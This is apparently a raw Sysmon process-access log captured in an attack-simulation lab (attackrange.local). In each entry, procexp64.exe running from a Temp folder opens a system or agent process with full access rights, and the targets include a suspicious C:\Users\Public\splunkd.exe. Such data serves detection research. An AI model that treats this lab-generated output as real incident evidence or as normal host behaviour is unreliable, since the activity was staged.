15:15:55.330{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785814Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:55.330{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785813Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:55.330{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785812Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:55.330{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785811Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:55.330{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785810Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:55.330{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785809Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:55.330{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785808Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:55.330{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785807Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:55.330{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785806Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:55.330{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785805Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:55.330{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785804Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:55.330{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785803Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:55.330{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785802Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:55.330{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785801Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:55.330{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785800Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:55.330{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785799Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:55.330{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785798Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:55.330{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785797Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:55.330{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785796Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:55.330{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785795Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:55.330{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785794Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:55.330{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785793Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:55.330{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785792Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:55.330{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785791Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:55.330{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785790Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:55.330{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785789Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:55.330{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785788Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:55.330{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785787Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:55.330{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785786Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:55.330{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785785Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:55.330{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785784Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:55.330{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785783Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:55.330{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785782Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:55.330{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785781Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:55.330{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785780Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:55.330{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785779Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:55.330{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785778Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:55.330{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 